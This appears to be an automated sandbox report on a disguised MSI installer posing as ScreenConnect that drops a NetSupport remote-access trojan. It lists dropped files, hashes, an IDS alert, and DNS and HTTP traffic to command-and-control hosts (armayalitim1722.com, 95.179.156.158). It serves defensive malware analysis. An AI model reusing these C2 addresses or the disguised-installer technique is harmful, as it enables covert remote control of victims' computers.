Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L....J.............!.........................................................0............@.......................................... ..................................8............................................................................text...............................@..@.rsrc........ ......................@..@.....J..........T...8...8........J..........$...................8....rdata..8...x....rdata$zzzdbg.... ..`....rsrc$01....` .......rsrc$02.... ...........r..&..0.9Kz?.B..V.N.J..........................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\winrssrv.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.907269785124234
Encrypted:	false
SSDEEP:	192:YlhOulH3yBNi+ckYazlA0rvh/CV1rZgWDdIaUWr:YlhOiyBNi+ckYavrvqZgWyvW
MD5:	625DF63352C6610780AB954A69544B6A
SHA1:	FD140F2E912367F0A53587A799ECE2BC01A920DE
SHA-256:	D8ECEA519099F72843B0956C20C128B7948FF84311825DF4C9D8128B13584442
SHA-512:	BDEA8F069C6AADEFD2902646AFB427CF19884255684B74F3EDBFA7204E45D281A530A1F4E5095B57B20624FCD7526730400B7C153EB90CC9AA3E897DFE974783
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.....~...~...~.......~...}...~...z...~.....8.~.......~...~...~...v...~.......~...\|...~.Rich..~.........PE..L...Pls............!................0........0...............................p......l=....@A.........................#.......@.......P.......................`..........T............................................@...............................text............................... ..`.data...`....0......................@....idata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`.......(..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\519b7a.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: ScreenConnect, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install ScreenConnect., Template: Intel;1033, Revision Number: {9B624BA3-42FE-4CC9-8146-EDCB22CEEA11}, Create Time/Date: Thu Sep 26 22:59:42 2024, Last Saved Time/Date: Thu Sep 26 22:59:42 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
Category:	dropped
Size (bytes):	4767744
Entropy (8bit):	7.994318357167426
Encrypted:	true
SSDEEP:	98304:DAowTTYcM2Pewg9Y6mnjZpLhL8QaQs74iQlSKsrM18o4bbmo+IW/+b:DAouq2PW9YJjjLhPq4VlSKuMkb7r++b
MD5:	999440B3B0609A7FA2F06F4D07FA8E6E
SHA1:	A6B7839D287C71E8C724DF8CC024C4F7D7AE9057
SHA-256:	2A0F495CD25DCBF02B2B0B11032D32A0460C9B7C5AD491AFA4060EA3CA675F90
SHA-512:	C98A2DC0D1ABA3B4E8488461CABA4FA09656B623914161C7956A09C98C1D12835CDDF5D499F97535C4886B104BD0870E4F2FD27A7E69BA9C4D58165E3907BB7D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\519b7c.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: ScreenConnect, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install ScreenConnect., Template: Intel;1033, Revision Number: {9B624BA3-42FE-4CC9-8146-EDCB22CEEA11}, Create Time/Date: Thu Sep 26 22:59:42 2024, Last Saved Time/Date: Thu Sep 26 22:59:42 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
Category:	dropped
Size (bytes):	4767744
Entropy (8bit):	7.994318357167426
Encrypted:	true
SSDEEP:	98304:DAowTTYcM2Pewg9Y6mnjZpLhL8QaQs74iQlSKsrM18o4bbmo+IW/+b:DAouq2PW9YJjjLhPq4VlSKuMkb7r++b
MD5:	999440B3B0609A7FA2F06F4D07FA8E6E
SHA1:	A6B7839D287C71E8C724DF8CC024C4F7D7AE9057
SHA-256:	2A0F495CD25DCBF02B2B0B11032D32A0460C9B7C5AD491AFA4060EA3CA675F90
SHA-512:	C98A2DC0D1ABA3B4E8488461CABA4FA09656B623914161C7956A09C98C1D12835CDDF5D499F97535C4886B104BD0870E4F2FD27A7E69BA9C4D58165E3907BB7D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI9D3F.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	5457
Entropy (8bit):	5.198019950886406
Encrypted:	false
SSDEEP:	96:l3o6UurHBkgZHmeLu3ki5KZhSWo3TLgcEUhh4ROsxHJd/oWCaB6e6pxb7DMJEPXo:l31laVeui/Sh3aIJe6fAW3o
MD5:	100432FA3F8563103344A44C8771FE02
SHA1:	6263EEC3295EBDCF80A6DC00E83D57E271A283EE
SHA-256:	207751B60D6A8F8C10D32928E47189CF1AEA956FE8185BF6163D8133F523EFBF
SHA-512:	39FFA8176F03D619E79055C054E1F677FF8ED48D5F9C117F301DE5F434804F27549B675A55EC83B0B57DA36E2DA7364C7AFE61A20504CEE609C689FD45BADF8A
Malicious:	false
Preview:	...@IXOS.@.....@\|ghY.@.....@.....@.....@.....@.....@......&.{AA354307-EBD0-4C41-9B74-0AF1BD8AA230}..ScreenConnect..72BF1aHUKl.msi.@.....@.....@.....@........&.{9B624BA3-42FE-4CC9-8146-EDCB22CEEA11}.....@.....@.....@.....@.......@.....@.....@.......@......ScreenConnect......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{B5F5E367-F63E-4390-BA71-027FFBEC21B6}%.01:\Software\MScreenConnect\installed.@.......@.....@.....@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.+...@.....@........C:\ProgramData\MScreenConnect\....1\g6t59hne\\|MScreenConnect\......Please insert the disk: ..cab1.cab.@.....@......C:\Windows\Installer\519b7a.msi.........@........nt-00ijl.dll\|AudioCapture.dll..file0..AudioCapture.dll.@.....@.3...@.......@.............@......14.0.0.555..2057.@........rxinwno_.dll\|appverifUI.dll..file00..appverifUI.dll.@...

C:\Windows\Installer\SourceHash{AA354307-EBD0-4C41-9B74-0AF1BD8AA230}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1640260011192423
Encrypted:	false
SSDEEP:	12:JSbX72Fj7AGiLIlHVRpZh/7777777777777777777777777vDHFTK2woEdit/l0G:JVQI5tYoHiF
MD5:	49E8CC2B085E1317750FB038307E9CD2
SHA1:	E5D4EE06B890609A7EC247A56FF9FCF6A979517F
SHA-256:	B89A2FF2E5E8E566B33DF1FB920B14323383770B119BCEC4DC33EB657F79D998
SHA-512:	A2686183D2159588F85511246D92DCA60B7570DFCC2ED28BF9C94FEF9AAB838F93D90F820BE0DEBD4D24ED799189CB612039D78B4641244D14BD95CDE353CDA0
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.4683404612262216
Encrypted:	false
SSDEEP:	24:JRO38PhAuh3iFip1GE2yza2tzKAMBHoZagUMClXt+fs+v+oipV7VQwGrlrkgg+o6:w8PhAuRc06WXJWjT5RpoS5ErboSIUDH
MD5:	AB5A070D84EF9FED9914630BD7F41DB1
SHA1:	11001DFD69AEA0A64348FD450BE9437E0918F0B4
SHA-256:	03C157AABFB01C8CE4F608222A19D0AC0AA8191E99EEC013336F962C999053A1
SHA-512:	470A8852D1CC0E9D9F5C51EC7AF8FABDD764C94581F5DBE0F0E352AF379846F203546E0EA217C280D63836A3890D91631156124DC24D683FC57A58BFC20282CA
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	364484
Entropy (8bit):	5.3654968978595745
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau4:zTtbmkExhMJCIpEL
MD5:	E9549E6BB73465503C1A17EE6F0619A9
SHA1:	680B27F2561A0738F6A2E3A9FB774E48DED31135
SHA-256:	6BAE21FF392FA7EB50F0EA784DE68B6485889623AC4B5E0FD2D68FD45B6FC31C
SHA-512:	EE69BB2769378857C21307FBD26951A9607D2EA2795C5E1B3E05009E187D718F509B07DC70ECE09CDE70BA4E9B1641D9534AE156A403EA0EF510678FF195A512
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF29E886BDD46F6CBE.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.0715933076167414
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOA7UK2ReoEQgVky6lit/:2F0i8n0itFzDHFTK2woEKit/
MD5:	0F7DD064EE1330511B0C0D3618B3F62E
SHA1:	D2B1233ECAF4D098F491DEE1DD02A94D9BD40BCD
SHA-256:	5A446CB057E182F5036F7D2929F3B68746272B61987C7F7A930481A2E79113C7
SHA-512:	49042DC6133199042936A71DC1FC77E0159888B43A9A7FA26117EBDE1E9CBF99E6E0B95A2EEE3CC1E6E497538716DA5612F84D946A19B59F9B926209ED9B52DC
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF350D14D9B4AF6093.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF42CC0BF24B6E63B8.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5A562DBF858E74AF.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5C7EDCE163A15541.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF6098184F9D844E85.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1834815010265174
Encrypted:	false
SSDEEP:	24:JjhC3XouxSiEipKP2xza2tzhALZZagUMClXtdofs+v+oipV7VQwGrlrkgg+oipV9:kXouQJveFXJxT5BpoS5ErboSIUDH
MD5:	8C9DED17926C599ECC2122832881337A
SHA1:	6883EB184B6188733F74D626F370486538FD9CA8
SHA-256:	1CD07ED1BA05D17BA25018B1EA92BFB906F986DC1BE88A46A08BC11025190015
SHA-512:	5ED4BDAC0F0D7AB7676F6684DC81E383270D8659EE606D7E5A25FB22C2AE414292FC34F96D642744F409BF4DF3E230F1AE8B3102FD044ED64F6C4D2B59F10A51
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF640DCD8D87083C6C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.4683404612262216
Encrypted:	false
SSDEEP:	24:JRO38PhAuh3iFip1GE2yza2tzKAMBHoZagUMClXt+fs+v+oipV7VQwGrlrkgg+o6:w8PhAuRc06WXJWjT5RpoS5ErboSIUDH
MD5:	AB5A070D84EF9FED9914630BD7F41DB1
SHA1:	11001DFD69AEA0A64348FD450BE9437E0918F0B4
SHA-256:	03C157AABFB01C8CE4F608222A19D0AC0AA8191E99EEC013336F962C999053A1
SHA-512:	470A8852D1CC0E9D9F5C51EC7AF8FABDD764C94581F5DBE0F0E352AF379846F203546E0EA217C280D63836A3890D91631156124DC24D683FC57A58BFC20282CA
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFADD95C5FB1F1B443.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.4683404612262216
Encrypted:	false
SSDEEP:	24:JRO38PhAuh3iFip1GE2yza2tzKAMBHoZagUMClXt+fs+v+oipV7VQwGrlrkgg+o6:w8PhAuRc06WXJWjT5RpoS5ErboSIUDH
MD5:	AB5A070D84EF9FED9914630BD7F41DB1
SHA1:	11001DFD69AEA0A64348FD450BE9437E0918F0B4
SHA-256:	03C157AABFB01C8CE4F608222A19D0AC0AA8191E99EEC013336F962C999053A1
SHA-512:	470A8852D1CC0E9D9F5C51EC7AF8FABDD764C94581F5DBE0F0E352AF379846F203546E0EA217C280D63836A3890D91631156124DC24D683FC57A58BFC20282CA
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB72B0BE5691B5F4E.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	0.10596893575759157
Encrypted:	false
SSDEEP:	24:oz9JfAekfbB+oipVs+oipV7VQwGrlrkg5+R:C9UDooSFoS5Er5
MD5:	D880277B54DD6C42B37BC75A8209368A
SHA1:	9DA401D23FE87F6B3AF6EAF75D616877D828ED78
SHA-256:	041B3CF8DA7CA252E6DF360C8EA694BFF4F14D379BAB5E39BB8621155A7C1F40
SHA-512:	A021F124FB582CF49FB798463955F3F111C55DC622C06C8C873393812C6E3C89041577A1EF6424033F3A73285D0239B33B25493C4F891F54DC0ED227ABE1E04B
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB859D3DA71B1FCE5.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE6526B064BCA6268.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1834815010265174
Encrypted:	false
SSDEEP:	24:JjhC3XouxSiEipKP2xza2tzhALZZagUMClXtdofs+v+oipV7VQwGrlrkgg+oipV9:kXouQJveFXJxT5BpoS5ErboSIUDH
MD5:	8C9DED17926C599ECC2122832881337A
SHA1:	6883EB184B6188733F74D626F370486538FD9CA8
SHA-256:	1CD07ED1BA05D17BA25018B1EA92BFB906F986DC1BE88A46A08BC11025190015
SHA-512:	5ED4BDAC0F0D7AB7676F6684DC81E383270D8659EE606D7E5A25FB22C2AE414292FC34F96D642744F409BF4DF3E230F1AE8B3102FD044ED64F6C4D2B59F10A51
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF4502186111BA6AC.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1834815010265174
Encrypted:	false
SSDEEP:	24:JjhC3XouxSiEipKP2xza2tzhALZZagUMClXtdofs+v+oipV7VQwGrlrkgg+oipV9:kXouQJveFXJxT5BpoS5ErboSIUDH
MD5:	8C9DED17926C599ECC2122832881337A
SHA1:	6883EB184B6188733F74D626F370486538FD9CA8
SHA-256:	1CD07ED1BA05D17BA25018B1EA92BFB906F986DC1BE88A46A08BC11025190015
SHA-512:	5ED4BDAC0F0D7AB7676F6684DC81E383270D8659EE606D7E5A25FB22C2AE414292FC34F96D642744F409BF4DF3E230F1AE8B3102FD044ED64F6C4D2B59F10A51
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: ScreenConnect, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install ScreenConnect., Template: Intel;1033, Revision Number: {9B624BA3-42FE-4CC9-8146-EDCB22CEEA11}, Create Time/Date: Thu Sep 26 22:59:42 2024, Last Saved Time/Date: Thu Sep 26 22:59:42 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
Entropy (8bit):	7.994318357167426
TrID:	Microsoft Windows Installer (60509/1) 88.31% Generic OLE2 / Multistream Compound File (8008/1) 11.69%
File name:	72BF1aHUKl.msi
File size:	4'767'744 bytes
MD5:	999440b3b0609a7fa2f06f4d07fa8e6e
SHA1:	a6b7839d287c71e8c724df8cc024c4f7d7ae9057
SHA256:	2a0f495cd25dcbf02b2b0b11032d32a0460c9b7c5ad491afa4060ea3ca675f90
SHA512:	c98a2dc0d1aba3b4e8488461caba4fa09656b623914161c7956a09c98c1d12835cddf5d499f97535c4886b104bd0870e4f2fd27a7e69ba9c4d58165e3907bb7d
SSDEEP:	98304:DAowTTYcM2Pewg9Y6mnjZpLhL8QaQs74iQlSKsrM18o4bbmo+IW/+b:DAouq2PW9YJjjLhPq4VlSKuMkb7r++b
TLSH:	D22633683858272CE5325B34A51AD6789E60BF6BE7FAD1371882F58D87713A1B1F3C10
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-08T18:59:50.608310+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.5	49710	95.179.156.158	443	TCP
2024-11-08T19:00:12.860365+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.5	49713	TCP
2024-11-08T19:00:51.765321+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.5	49898	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 8, 2024 18:59:58.161098957 CET	49709	80	192.168.2.5	172.67.68.212
Nov 8, 2024 18:59:58.165992022 CET	80	49709	172.67.68.212	192.168.2.5
Nov 8, 2024 18:59:58.166065931 CET	49709	80	192.168.2.5	172.67.68.212
Nov 8, 2024 18:59:58.166214943 CET	49709	80	192.168.2.5	172.67.68.212
Nov 8, 2024 18:59:58.171457052 CET	80	49709	172.67.68.212	192.168.2.5
Nov 8, 2024 18:59:58.411597967 CET	49710	443	192.168.2.5	95.179.156.158
Nov 8, 2024 18:59:58.411621094 CET	443	49710	95.179.156.158	192.168.2.5
Nov 8, 2024 18:59:58.411858082 CET	49710	443	192.168.2.5	95.179.156.158
Nov 8, 2024 18:59:58.468828917 CET	49710	443	192.168.2.5	95.179.156.158
Nov 8, 2024 18:59:58.468849897 CET	443	49710	95.179.156.158	192.168.2.5
Nov 8, 2024 18:59:58.468895912 CET	443	49710	95.179.156.158	192.168.2.5
Nov 8, 2024 18:59:59.081093073 CET	80	49709	172.67.68.212	192.168.2.5
Nov 8, 2024 18:59:59.081223965 CET	49709	80	192.168.2.5	172.67.68.212
Nov 8, 2024 18:59:59.086199999 CET	49709	80	192.168.2.5	172.67.68.212
Nov 8, 2024 18:59:59.086293936 CET	49709	80	192.168.2.5	172.67.68.212
Nov 8, 2024 18:59:59.087903976 CET	49711	80	192.168.2.5	172.67.68.212
Nov 8, 2024 18:59:59.092730999 CET	80	49711	172.67.68.212	192.168.2.5
Nov 8, 2024 18:59:59.092897892 CET	49711	80	192.168.2.5	172.67.68.212
Nov 8, 2024 18:59:59.096826077 CET	49711	80	192.168.2.5	172.67.68.212
Nov 8, 2024 18:59:59.101922035 CET	80	49711	172.67.68.212	192.168.2.5
Nov 8, 2024 19:00:00.006431103 CET	80	49711	172.67.68.212	192.168.2.5
Nov 8, 2024 19:00:00.008852959 CET	49711	80	192.168.2.5	172.67.68.212
Nov 8, 2024 19:00:00.015115976 CET	49711	80	192.168.2.5	172.67.68.212
Nov 8, 2024 19:00:00.015155077 CET	49711	80	192.168.2.5	172.67.68.212
Nov 8, 2024 19:00:00.031991959 CET	49712	80	192.168.2.5	172.67.68.212
Nov 8, 2024 19:00:00.036806107 CET	80	49712	172.67.68.212	192.168.2.5
Nov 8, 2024 19:00:00.039156914 CET	49712	80	192.168.2.5	172.67.68.212
Nov 8, 2024 19:00:00.087197065 CET	49712	80	192.168.2.5	172.67.68.212
Nov 8, 2024 19:00:00.091986895 CET	80	49712	172.67.68.212	192.168.2.5
Nov 8, 2024 19:00:00.950584888 CET	80	49712	172.67.68.212	192.168.2.5
Nov 8, 2024 19:00:00.950644016 CET	49712	80	192.168.2.5	172.67.68.212
Nov 8, 2024 19:00:00.951262951 CET	49712	80	192.168.2.5	172.67.68.212
Nov 8, 2024 19:00:00.951303005 CET	49712	80	192.168.2.5	172.67.68.212

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 8, 2024 18:59:57.664478064 CET	49992	53	192.168.2.5	1.1.1.1
Nov 8, 2024 18:59:57.697062016 CET	53	49992	1.1.1.1	192.168.2.5
Nov 8, 2024 18:59:57.754894018 CET	65453	53	192.168.2.5	1.1.1.1
Nov 8, 2024 18:59:58.146048069 CET	54878	53	192.168.2.5	1.1.1.1
Nov 8, 2024 18:59:58.154969931 CET	53	54878	1.1.1.1	192.168.2.5
Nov 8, 2024 18:59:58.410435915 CET	53	65453	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 8, 2024 18:59:57.664478064 CET	192.168.2.5	1.1.1.1	0xabbf	Standard query (0)	armayalitim.com	A (IP address)	IN (0x0001)	false
Nov 8, 2024 18:59:57.754894018 CET	192.168.2.5	1.1.1.1	0x4452	Standard query (0)	armayalitim1722.com	A (IP address)	IN (0x0001)	false
Nov 8, 2024 18:59:58.146048069 CET	192.168.2.5	1.1.1.1	0x35c4	Standard query (0)	geo.netsupportsoftware.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 8, 2024 18:59:57.697062016 CET	1.1.1.1	192.168.2.5	0xabbf	Name error (3)	armayalitim.com	none	none	A (IP address)	IN (0x0001)	false
Nov 8, 2024 18:59:58.154969931 CET	1.1.1.1	192.168.2.5	0x35c4	No error (0)	geo.netsupportsoftware.com		172.67.68.212	A (IP address)	IN (0x0001)	false
Nov 8, 2024 18:59:58.154969931 CET	1.1.1.1	192.168.2.5	0x35c4	No error (0)	geo.netsupportsoftware.com		104.26.0.231	A (IP address)	IN (0x0001)	false
Nov 8, 2024 18:59:58.154969931 CET	1.1.1.1	192.168.2.5	0x35c4	No error (0)	geo.netsupportsoftware.com		104.26.1.231	A (IP address)	IN (0x0001)	false
Nov 8, 2024 18:59:58.410435915 CET	1.1.1.1	192.168.2.5	0x4452	No error (0)	armayalitim1722.com		95.179.156.158	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

geo.netsupportsoftware.com

95.179.156.158connection: keep-alivecmd=pollinfo=1ack=1

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	172.67.68.212	80	2468	C:\ProgramData\MScreenConnect\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 18:59:58.166214943 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
